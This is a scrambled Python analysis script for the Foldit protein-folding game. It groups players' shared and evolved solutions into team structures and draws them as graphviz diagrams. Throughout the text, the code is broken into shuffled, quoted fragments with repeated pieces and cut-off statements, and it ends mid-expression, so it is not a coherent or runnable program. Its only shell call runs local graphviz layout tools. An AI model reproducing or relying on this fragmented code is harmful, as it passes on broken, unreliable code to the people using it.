list(plt.get_cmap('tab20b').colors)] new_uids = uids[:] for prev_uid, color in group_colors.items(): colors.remove(color) if prev_uid", "+= 1 return cands[i] def col_to_str(col): return '#' + (\"%0.2X%0.2X%0.2X\" % (int(col[0] *", "parser.add_argument('pids', nargs='+') args = parser.parse_args() if args.debug: for pid in args.pids: render_collab(pid) else:", "json import logging from itertools import groupby import pandas as pd import numpy", "cdict = {} # gids = set([xs[0].gid for xs in shared.values()] + [get_source(e)['header']['gid']", "in r.evol_target_lines for p in l.pdb_infos] if r.evol_lines else []), key=lambda p: p.timestamp),", "gid, g in groupby( sorted(set(sum(pdb_infos.map(lambda d: [(x.gid, x.uid) for x in d if", "shared solution but didn't do anything # uid_grouped = groupby(sorted(passive_evolves, key=lambda e: e.uid),", "else \"diamond\" # c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, style='filled,solid' if", "edge_attr={'color': '#00000055'}) group_clusters = {gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)}) for gid in groups_uids} evolved", "import PDB_Info, get_data_value from typing import NamedTuple, Tuple, List, Dict import matplotlib matplotlib.use(\"Agg\")", "cdict[gid][uid] = c group_colors[uid] = c dot = Digraph(name=\"parent\", graph_attr={'forecelabels': 'true', 'K': '0.6',", "(s.uid, s.pid))) def get_collab_children(root_tag: ShareTag, collab: Collaborator, evolves_by_source: dict) -> List[Collaborator]: children =", "({} ignored)\".format(uid, num_ignored), 'forcelabels': 'true', # 'style': 'filled', 'fillcolor': cdict[pdbs[0].gid]}, # node_attr={'style': 'filled'})", "in sorted(collabs['2003642'], key=lambda c: c.pdbs[0].gid): # print(collab.pdbs[0].gid) # print(collab.tag) # front = [(1,", "'oval'}, # graph_attr={'label': '{}_active_evolvers'.format(gid)}) # for gid in gids} for uid, evolved_targets in", "p in pdbs: if p.scoretype == '2' and not is_corrupted(p.pdl, p.uid): source =", "{tag: list(pdbs) for tag, pdbs in groupby(sorted(active_evolves, key=lambda s: get_source_tag(s)), lambda s: get_source_tag(s))}", "pdbs, {c.name: c.energy * c.weight for c in best.energy_components}, ShareTag(uid, round(best.energy, 4)), collab,", "if int(x.sharing_gid) > 1 or (int(x.sharing_gid) == 0 and x.scoretype == '2' and", "p: p.energy) child = Collaborator(uid, collab.gid, pdbs, {c.name: c.energy * c.weight for c", "int(col[1] * 0xff), int(col[2] * 0xff))) def is_corrupted(pdl, uid): return all(p['actions'] == {}", "> 0: # ntab, cur = front.pop() # print(\" \"*ntab, cur.tag) # front.extend([(ntab", "evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values(): # dot.subgraph(sg) # do it", "not in evolved]) # with dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label': \"{}_shared ({} ignored)\".format(uid, num_ignored), 'forcelabels':", "evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] = True for uid, pdbs in shared.items(): gid", "+ (\"%0.2X%0.2X%0.2X\" % (int(col[0] * 0xff), int(col[1] * 0xff), int(col[2] * 0xff))) def", "min(e.timestamp for e in evolves) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 *", "# print(\" \"*ntab, cur.tag) # front.extend([(ntab + 1, c) for c in cur.children])", "parser.parse_args() if args.debug: for pid in args.pids: render_collab(pid) else: with ProcessPoolExecutor(30) as pool:", "evolved_targets] for pdbs in shared.values()), []) evolves_by_source = {tag: list(pdbs) for tag, pdbs", "* (evoling_start - start) / (end - start), 0.7) # evolving_time = sum(get_sessions([e.timestamp", "for prev_uid, color in group_colors.items(): colors.remove(color) if prev_uid in new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid] =", "s.sid in sids: return s.uid + \"evol\" + str(i) raise ValueError(\"evolver pdb {}", "collab, evolves_by_source)) collabs[pid].append(collab) return collabs # for collab in sorted(collabs['2003642'], key=lambda c: c.pdbs[0].gid):", "1: child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source)) return children def get_team_structures(data, soln_lookup, child_lookup): collabs = {}", "/ (end - start), 0.7) # evolving_time = sum(get_sessions([e.timestamp for e in evolves])", "= {uid: get_data_value(uid, pid, \"evol_target_lines\", df) for uid in df.uid} euid_lookup = {pdb.sid:", "[])} shared = {uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda d: [x", "return s.uid for i, line in enumerate(lines): sids = [p.sid for p in", "root in roots: tag = get_tag(root) sids = get_relevant_sids(root, soln_lookup, child_lookup) collab =", "children.append(child) for pdb in pdbs: if get_tag(pdb) in evolves_by_source and int(pdb.sharing_gid) > 1:", "> 1 or (int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1][ 'actions'])]),", "and x.pdl[-1][ 'actions'])]), []))), lambda p: p[0])} for gid, uids in groups_uids.items(): cdict[gid]", "= [] for root in roots: tag = get_tag(root) sids = get_relevant_sids(root, soln_lookup,", "matplotlib.pyplot as plt from graphviz import Digraph from concurrent.futures import ProcessPoolExecutor from foldit.foldit_data", "class ShareTag(NamedTuple): uid: str energy: float class Collaborator(NamedTuple): uid: str gid: str pdbs:", "ProcessPoolExecutor from foldit.foldit_data import get_relevant_sids from util import PDB_Info, get_data_value from typing import", "tag, None, None, []) collab.children.extend(get_collab_children(tag, collab, evolves_by_source)) collabs[pid].append(collab) return collabs # for collab", "to fix cluster layout outname = \"collab_viz/collab_{}\".format(pid) with open(outname, 'w') as out: out.write(dot.source)", "while len(front) > 0: # ntab, cur = front.pop() # print(\" \"*ntab, cur.tag)", "in group_colors.items(): colors.remove(color) if prev_uid in new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid] = color assert len(colors)", "user_colors.setdefault(gid, {}) colors = [col_to_str(c) for c in list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)] new_uids =", "dot.subgraph(sg) # nodes and edges for shared solutions for uid, pdbs in shared.items():", "= {} # create evolver nodes & edges uid_grouped = groupby(sorted(active_evolves, key=lambda e:", "check=True) class ShareTag(NamedTuple): uid: str energy: float class Collaborator(NamedTuple): uid: str gid: str", "group_clusters.values(): dot.subgraph(cluster) # output raw source, then use command line graphviz tools to", "= [p.sid for p in line.pdb_infos] if s.sid in sids: return s.uid +", "group by evolver uid_source_grouped = { uid: {k: list(g) for k, g in", "groupby(sorted(active_evolves, key=lambda e: euid_lookup[e.sid]), lambda e: euid_lookup[e.sid]) # group by evolver uid_source_grouped =", "evol_lines_lookup[pdb.uid]) for pdb in sum(pdb_infos.values, [])} shared = {uid: list(pdbs) for uid, pdbs", "+ passive_evolves]) # cm = plt.get_cmap('tab10' if len(gids) <= 10 else 'tab20') #", "time for people who just loaded in a shared solution but didn't do", "= data[data.pid == pid] start = df.timestamps.apply(min).min() end = df.timestamps.apply(max).max() pdb_infos = df.apply(lambda", "'2' and x.pdl[-1]['actions']]), [])) passive_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in", "+ np.log10(len(evolves))), style=\"dashed\" if min(e.energy for e in evolves) >= target[1] else \"solid\")", "cands[i]['header']['uid'] == e.uid: i += 1 return cands[i] def col_to_str(col): return '#' +", "int(x.sharing_gid) > 1]), []), key=lambda p: euid_lookup[p.sid]), lambda p: euid_lookup[p.sid])} active_evolves = remove_corrupted(sum(pdb_infos.map(", "euid_lookup[e.sid]), lambda e: euid_lookup[e.sid]) # group by evolver uid_source_grouped = { uid: {k:", "/ (end - start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False)", "penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] = True for uid, pdbs in shared.items():", "list(pdbs) for uid, pdbs in groupby(sorted(xs, key=lambda x: euid_lookup[x.sid]), lambda x: euid_lookup[x.sid])} for", "uid_source_grouped.items(): gid = list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) for target, evolves in evolved_targets.items():", "p: p[0])} for gid, uids in groups_uids.items(): cdict[gid] = {} group_colors = user_colors.setdefault(gid,", "for uid, pdbs in evolves_by_source[root_tag].items(): best = min(pdbs, key=lambda p: p.energy) child =", "gids = set([xs[0].gid for xs in shared.values()] + [get_source(e)['header']['gid'] for e in active_evolves", "front.extend([(ntab + 1, c) for c in cur.children]) if __name__ == '__main__': parser", "evolved_targets.items(): # dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3', style='dashed') # evolved[\"{}@{:.2f}\".format(*target)] = True # for sg", "sids = get_relevant_sids(root, soln_lookup, child_lookup) collab = Collaborator(tag.uid, root.gid, [soln_lookup[sid] for sid in", "anything # uid_grouped = groupby(sorted(passive_evolves, key=lambda e: e.uid), lambda e: e.uid) # uid_source_grouped", "ShareTag parent: \"Collaborator\" source: ShareTag children: List[\"Collaborator\"] def get_tag(s: PDB_Info) -> ShareTag: return", "def remove_corrupted(pdb_infos): return [x for x in pdb_infos if not is_corrupted(x.pdl, x.uid)] def", "in active_evolves + passive_evolves]) # cm = plt.get_cmap('tab10' if len(gids) <= 10 else", "import NamedTuple, Tuple, List, Dict import matplotlib matplotlib.use(\"Agg\") def get_source(e): cands = e.pdl[-2::-1]", "[]), key=lambda p: p.timestamp), axis=1) evol_lines_lookup = {uid: get_data_value(uid, pid, \"evol_target_lines\", df) for", "x in d if int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1]['actions']]),", "s.uid + \"evol\" + str(i) raise ValueError(\"evolver pdb {} not found in any", "[x for x in d if x.scoretype == '2' and x.pdl[-1]['actions']]), [])) uid_grouped", "in evolves_by_source and int(pdb.sharing_gid) > 1: child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source)) return children def get_team_structures(data,", "x: euid_lookup[x.sid]), lambda x: euid_lookup[x.sid])} for tag, xs in evolves_by_source.items()} collabs[pid] = []", "'filled,dashed', fillcolor=cdict[gid][uid]) # color=\"#ffffff\") for cluster in group_clusters.values(): dot.subgraph(cluster) # output raw source,", "evolver_clusters.values(): # dot.subgraph(sg) # nodes and edges for shared solutions for uid, pdbs", "pdbs: if p.scoretype == '2' and not is_corrupted(p.pdl, p.uid): source = get_source(p) #", "= pdbs[0].gid for p in pdbs: if p.scoretype == '2' and not is_corrupted(p.pdl,", "for gid, g in groupby( sorted(set(sum(pdb_infos.map(lambda d: [(x.gid, x.uid) for x in d", "uid, evolved_targets in uid_source_grouped.items(): gid = list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) for target,", "p.energy)] else 'filled,dashed', fillcolor=cdict[gid][uid]) # color=\"#ffffff\") for cluster in group_clusters.values(): dot.subgraph(cluster) # output", "import argparse import os import csv import json import logging from itertools import", "gid, c in zip(gids, cm.colors): # cdict[gid] = col_to_str(c) groups_uids = {gid: [uid", "p: p.energy) for k, g in # groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), #", "p.uid), lambda p: p.uid)} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in", "= [col_to_str(c) for c in list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)] new_uids = uids[:] for prev_uid,", "for l in r.lines for p in l.pdb_infos] if r.lines else []) +", "in shared.items(): gid = pdbs[0].gid num_ignored = len([p for p in pdbs if", "evolved = {} # create evolver nodes & edges uid_grouped = groupby(sorted(active_evolves, key=lambda", "else []) + ([p for l in r.evol_target_lines for p in l.pdb_infos] if", "1]), []), key=lambda p: p.uid), lambda p: p.uid)} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d:", "in df.uid} euid_lookup = {pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for pdb in sum(pdb_infos.values, [])} shared", "List[Collaborator]: children = [] for uid, pdbs in evolves_by_source[root_tag].items(): best = min(pdbs, key=lambda", "out anyone who later actively evolved # # evolver_clusters = {gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid),", "get_source_tag(s)), lambda s: get_source_tag(s))} evolves_by_source = {tag: {uid: list(pdbs) for uid, pdbs in", "num_ignored = len([p for p in pdbs if \"{}@{:.2f}\".format(uid, p.energy) not in evolved])", "assert len(colors) >= len(new_uids) for uid, c in zip(new_uids, colors): cdict[gid][uid] = c", "get_source(e): cands = e.pdl[-2::-1] i = 0 while cands[i]['header']['score'] == 9999.99 or cands[i]['actions']", "user_colors = {} for pid in data.pid.unique(): print(pid) df = data[data.pid == pid]", "uid: str energy: float class Collaborator(NamedTuple): uid: str gid: str pdbs: List[PDB_Info] energy_comps:", "groupby import pandas as pd import numpy as np import matplotlib.pyplot as plt", "or p['header']['score'] == 9999.99 for p in pdl) def remove_corrupted(pdb_infos): return [x for", "list(uid_source_grouped.keys()) # evolver_clusters = {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_active_evolvers'.format(gid)}) #", "e in evolves) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (evoling_start -", "Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_passive_evolvers'.format(gid)}) # for gid in gids}", "'filled', 'fillcolor': cdict[pdbs[0].gid]}, # node_attr={'style': 'filled'}) as c: for p in pdbs: if", "for uid, g in # uid_grouped if uid not in active_uids} # screen", "-Tpng -n2 -o {}.png\".format(outname, len(groups_uids)+1, outname), shell=True, check=True) class ShareTag(NamedTuple): uid: str energy:", "start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] =", "# edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (evoling_start - start) / (end", "do it again, this time for people who just loaded in a shared", "evolves]) group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2 + np.log10(len(evolves))), style=\"dashed\" if min(e.energy for", "= {} group_colors = user_colors.setdefault(gid, {}) colors = [col_to_str(c) for c in list(plt.get_cmap('tab20').colors)", "energy: float class Collaborator(NamedTuple): uid: str gid: str pdbs: List[PDB_Info] energy_comps: Dict[str, float]", "p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid, p.energy)] else 'filled,dashed',", "[]), key=lambda p: p.uid), lambda p: p.uid)} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x", "in evolver_clusters.values(): # dot.subgraph(sg) # do it again, this time for people who", "'true', # 'style': 'filled', 'fillcolor': cdict[pdbs[0].gid]}, # node_attr={'style': 'filled'}) as c: for p", "s.scoretype == \"1\": return s.uid for i, line in enumerate(lines): sids = [p.sid", "g in uid_grouped} # further group by source evolved_targets = {target for targets", "cdict[pdbs[0].gid]}, # node_attr={'style': 'filled'}) as c: for p in pdbs: if \"{}@{:.2f}\".format(uid, p.energy)", "pdbs[0].gid num_ignored = len([p for p in pdbs if \"{}@{:.2f}\".format(uid, p.energy) not in", "as out: out.write(dot.source) subprocess.run( \"ccomps -xC {} | dot | gvpack -array_c{} |", "neato -Tpng -n2 -o {}.png\".format(outname, len(groups_uids)+1, outname), shell=True, check=True) class ShareTag(NamedTuple): uid: str", "'forcelabels': 'true', # 'style': 'filled', 'fillcolor': cdict[pdbs[0].gid]}, # node_attr={'style': 'filled'}) as c: for", "+ ([p for l in r.evol_target_lines for p in l.pdb_infos] if r.evol_lines else", "for p in pdbs: if p.scoretype == '2' and not is_corrupted(p.pdl, p.uid): source", "if p.scoretype == '2' and not is_corrupted(p.pdl, p.uid): source = get_source(p) # edge_color", "= {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_active_evolvers'.format(gid)}) # for gid in", "= sum(get_sessions([e.timestamp for e in evolves]) group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2 +", "'2' and x.pdl[-1][ 'actions'])]), []))), lambda p: p[0])} for gid, uids in groups_uids.items():", "= colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (evoling_start - start) / (end - start),", "List[PDB_Info] energy_comps: Dict[str, float] tag: ShareTag parent: \"Collaborator\" source: ShareTag children: List[\"Collaborator\"] def", "= remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if int(x.sharing_gid) == 0", "xs in evolves_by_source.items()} collabs[pid] = [] for root in roots: tag = get_tag(root)", "ShareTag(source['header']['uid'], round(source['header']['score'], 4)) def get_evolver_uid(s: PDB_Info, lines: list) -> str: if s.scoretype ==", "-> str: if s.scoretype == \"1\": return s.uid for i, line in enumerate(lines):", "* c.weight for c in root.energy_components}, tag, None, None, []) collab.children.extend(get_collab_children(tag, collab, evolves_by_source))", "colors cdict = {} # gids = set([xs[0].gid for xs in shared.values()] +", "# print(collab.tag) # front = [(1, c) for c in collab.children] # while", "lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in uid_grouped} # further group by", "in uid_source_grouped.values() for target in targets} roots = sum(([p for p in pdbs", "= {pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for pdb in sum(pdb_infos.values, [])} shared = {uid: list(pdbs)", "= pdbs[0].gid num_ignored = len([p for p in pdbs if \"{}@{:.2f}\".format(uid, p.energy) not", "e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in # uid_grouped if uid not in", ">= target[1] else \"solid\") evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values(): #", "e.pdl[-2::-1] i = 0 while cands[i]['header']['score'] == 9999.99 or cands[i]['actions'] == {} or", "if r.lines else []) + ([p for l in r.evol_target_lines for p in", "* 0xff), int(col[2] * 0xff))) def is_corrupted(pdl, uid): return all(p['actions'] == {} or", "= [] for uid, pdbs in evolves_by_source[root_tag].items(): best = min(pdbs, key=lambda p: p.energy)", "active_uids = list(uid_source_grouped.keys()) # evolver_clusters = {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label':", "graph_attr={'forecelabels': 'true', 'K': '0.6', 'repulsiveforce': '2'}, node_attr={'style': 'filled'}, edge_attr={'color': '#00000055'}) group_clusters = {gid:", "list) -> str: if s.scoretype == \"1\": return s.uid for i, line in", "== {}]), [])) # map gids to colors cdict = {} # gids", "p.uid): source = get_source(p) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (p.timestamp", "def is_corrupted(pdl, uid): return all(p['actions'] == {} or p['header']['uid'] == uid or p['header']['uid']", "str(i) raise ValueError(\"evolver pdb {} not found in any evolver lines for {}\".format(s.sid,", "in evolved_targets.items(): # dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3', style='dashed') # evolved[\"{}@{:.2f}\".format(*target)] = True # for", "cluster in group_clusters.values(): dot.subgraph(cluster) # output raw source, then use command line graphviz", "def get_evolver_uid(s: PDB_Info, lines: list) -> str: if s.scoretype == \"1\": return s.uid", "os import csv import json import logging from itertools import groupby import pandas", "key=lambda p: p.timestamp), axis=1) shared = {uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map(", "do anything # uid_grouped = groupby(sorted(passive_evolves, key=lambda e: e.uid), lambda e: e.uid) #", "lambda d: [x for x in d if x.scoretype == '2' and x.pdl[-1]['actions']]),", "evolves_by_source)) collabs[pid].append(collab) return collabs # for collab in sorted(collabs['2003642'], key=lambda c: c.pdbs[0].gid): #", "get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for pdb in sum(pdb_infos.values, [])} shared = {uid: list(pdbs) for uid,", "in l.pdb_infos] if r.evol_lines else []), key=lambda p: p.timestamp), axis=1) shared = {uid:", "# further group by source active_uids = list(uid_source_grouped.keys()) # evolver_clusters = {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid),", "(get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in uid_grouped} # further", "for pid in args.pids: render_collab(pid) else: with ProcessPoolExecutor(30) as pool: pool.map(render_collab, args.pids, chunksize=1)", "numpy as np import matplotlib.pyplot as plt from graphviz import Digraph from concurrent.futures", "for p in line.pdb_infos] if s.sid in sids: return s.uid + \"evol\" +", "for sg in evolver_clusters.values(): # dot.subgraph(sg) # nodes and edges for shared solutions", "screen out anyone who later actively evolved # # evolver_clusters = {gid: Digraph(name=\"cluster_passive_", "(get_source(e)['header']['uid'], get_source(e)['header']['score'])), # lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in # uid_grouped", "get_source(e)['header']['score']))} for uid, g in # uid_grouped if uid not in active_uids} #", "= True for uid, pdbs in shared.items(): gid = pdbs[0].gid num_ignored = len([p", "get_tag(p) in evolved_targets] for pdbs in shared.values()), []) evolves_by_source = {tag: list(pdbs) for", "l.pdb_infos] if r.lines else []) + ([p for l in r.evol_target_lines for p", "col_to_str(c) groups_uids = {gid: [uid for _, uid in g] for gid, g", "{gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_active_evolvers'.format(gid)}) # for gid in gids}", "start) / (end - start), 0.7) # evolving_time = sum(get_sessions([e.timestamp for e in", "str gid: str pdbs: List[PDB_Info] energy_comps: Dict[str, float] tag: ShareTag parent: \"Collaborator\" source:", "\"Collaborator\" source: ShareTag children: List[\"Collaborator\"] def get_tag(s: PDB_Info) -> ShareTag: return ShareTag(s.uid, round(s.energy,", "by source active_uids = list(uid_source_grouped.keys()) # evolver_clusters = {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape': 'oval'},", "# graph_attr={'label': \"{}_shared ({} ignored)\".format(uid, num_ignored), 'forcelabels': 'true', # 'style': 'filled', 'fillcolor': cdict[pdbs[0].gid]},", "int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1]['actions'] == {}]), [])) #", "= df.timestamps.apply(min).min() end = df.timestamps.apply(max).max() pdb_infos = df.apply(lambda r: sorted(([p for l in", "c: for p in pdbs: if \"{}@{:.2f}\".format(uid, p.energy) in evolved: shape = \"box\"", "x in d if int(x.sharing_gid) > 1 or (int(x.sharing_gid) == 0 and x.scoretype", "Tuple, List, Dict import matplotlib matplotlib.use(\"Agg\") def get_source(e): cands = e.pdl[-2::-1] i =", "in shared.values()), []) evolves_by_source = {tag: list(pdbs) for tag, pdbs in groupby(sorted(active_evolves, key=lambda", "for uid, g in uid_grouped} # further group by source evolved_targets = {target", "concurrent.futures import ProcessPoolExecutor from foldit.foldit_data import get_relevant_sids from util import PDB_Info, get_data_value from", "color=\"#ffffff\") for cluster in group_clusters.values(): dot.subgraph(cluster) # output raw source, then use command", "groupby(sorted(active_evolves, key=lambda e: e.uid), lambda e: e.uid) # group by evolver uid_source_grouped =", "soln_lookup, child_lookup): collabs = {} for pid in data.pid.unique(): logging.debug(\"getting team structures for", "from concurrent.futures import ProcessPoolExecutor from foldit.foldit_data import get_relevant_sids from util import PDB_Info, get_data_value", "lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in # uid_grouped if uid not", "import numpy as np import matplotlib.pyplot as plt from graphviz import Digraph from", "in roots: tag = get_tag(root) sids = get_relevant_sids(root, soln_lookup, child_lookup) collab = Collaborator(tag.uid,", "[])) uid_grouped = groupby(sorted(active_evolves, key=lambda e: euid_lookup[e.sid]), lambda e: euid_lookup[e.sid]) # group by", "in evolves) >= target[1] else \"solid\") evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in", "not found in any evolver lines for {}\".format(s.sid, (s.uid, s.pid))) def get_collab_children(root_tag: ShareTag,", "+ str(i) raise ValueError(\"evolver pdb {} not found in any evolver lines for", "k, g in # groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), # lambda e: (get_source(e)['header']['uid'],", "-> List[Collaborator]: children = [] for uid, pdbs in evolves_by_source[root_tag].items(): best = min(pdbs,", "get_source(e)['header']['score'])), lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in uid_grouped} # further group", "in list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)] new_uids = uids[:] for prev_uid, color in group_colors.items(): colors.remove(color)", "if prev_uid in new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid] = color assert len(colors) >= len(new_uids) for", "def get_source(e): cands = e.pdl[-2::-1] i = 0 while cands[i]['header']['score'] == 9999.99 or", "0.7) # evolving_time = sum(get_sessions([e.timestamp for e in evolves]) group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid, *target),", "in collab.children] # while len(front) > 0: # ntab, cur = front.pop() #", "with open(outname, 'w') as out: out.write(dot.source) subprocess.run( \"ccomps -xC {} | dot |", "[x for x in d if int(x.sharing_gid) == 0 and x.scoretype == '2'", "evolves) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (evoling_start - start) /", "# uid_grouped if uid not in active_uids} # screen out anyone who later", "for p in pdbs if \"{}@{:.2f}\".format(uid, p.energy) not in evolved]) # with dot.subgraph(name=\"cluster_{}\".format(uid),", "graphviz tools to fix cluster layout outname = \"collab_viz/collab_{}\".format(pid) with open(outname, 'w') as", "x.uid) for x in d if int(x.sharing_gid) > 1 or (int(x.sharing_gid) == 0", "'repulsiveforce': '2'}, node_attr={'style': 'filled'}, edge_attr={'color': '#00000055'}) group_clusters = {gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)}) for", "> 1]), []), key=lambda p: euid_lookup[p.sid]), lambda p: euid_lookup[p.sid])} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda", "{ uid: {k: list(g) for k, g in groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])),", "uid_grouped} # further group by source active_uids = list(uid_source_grouped.keys()) # evolver_clusters = {gid:", "p['header']['score'] == 9999.99 for p in pdl) def remove_corrupted(pdb_infos): return [x for x", "all(p['actions'] == {} or p['header']['uid'] == uid or p['header']['uid'] == '0' or p['header']['score']", "# evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) # for target, evolve in evolved_targets.items(): # dot.edge(uid, \"{}@{:.2f}\".format(*target),", "for collab in sorted(collabs['2003642'], key=lambda c: c.pdbs[0].gid): # print(collab.pdbs[0].gid) # print(collab.tag) # front", "# uid: {k: min(g, key=lambda p: p.energy) for k, g in # groupby(sorted(g,", "fix cluster layout outname = \"collab_viz/collab_{}\".format(pid) with open(outname, 'w') as out: out.write(dot.source) subprocess.run(", "{}.png\".format(outname, len(groups_uids)+1, outname), shell=True, check=True) class ShareTag(NamedTuple): uid: str energy: float class Collaborator(NamedTuple):", "# cdict[gid] = col_to_str(c) groups_uids = {gid: [uid for _, uid in g]", "graph_attr={'label': '{}_active_evolvers'.format(gid)}) # for gid in gids} for uid, evolved_targets in uid_source_grouped.items(): gid", "shape = \"box\" if p.scoretype == '1' or is_corrupted(p.pdl, p.uid) else \"diamond\" #", "from graphviz import Digraph from concurrent.futures import ProcessPoolExecutor from foldit.foldit_data import get_relevant_sids from", "cur = front.pop() # print(\" \"*ntab, cur.tag) # front.extend([(ntab + 1, c) for", "and x.scoretype == '2' and x.pdl[-1][ 'actions'])]), []))), lambda p: p[0])} for gid,", "uid_grouped if uid not in active_uids} # screen out anyone who later actively", "for targets in uid_source_grouped.values() for target in targets} roots = sum(([p for p", "l in r.evol_target_lines for p in l.pdb_infos] if r.evol_lines else []), key=lambda p:", "key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in uid_grouped}", "list(g) for k, g in groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda e: (get_source(e)['header']['uid'],", "in groupby(sorted(g, key=lambda e: get_source_tag(e)), lambda e: get_source_tag(e))} for uid, g in uid_grouped}", "# do it again, this time for people who just loaded in a", "return s.uid + \"evol\" + str(i) raise ValueError(\"evolver pdb {} not found in", "(evoling_start - start) / (end - start), 0.7) # evolving_time = sum(get_sessions([e.timestamp for", "len(new_uids) for uid, c in zip(new_uids, colors): cdict[gid][uid] = c group_colors[uid] = c", "p.timestamp), axis=1) shared = {uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda d:", "targets} roots = sum(([p for p in pdbs if p.scoretype == '1' and", "== '1' and get_tag(p) in evolved_targets] for pdbs in shared.values()), []) evolves_by_source =", "in sum(pdb_infos.values, [])} shared = {uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda", "= {} for pid in data.pid.unique(): logging.debug(\"getting team structures for {}\".format(pid)) df =", "data[data.pid == pid] start = df.timestamps.apply(min).min() end = df.timestamps.apply(max).max() pdb_infos = df.apply(lambda r:", "sum(get_sessions([e.timestamp for e in 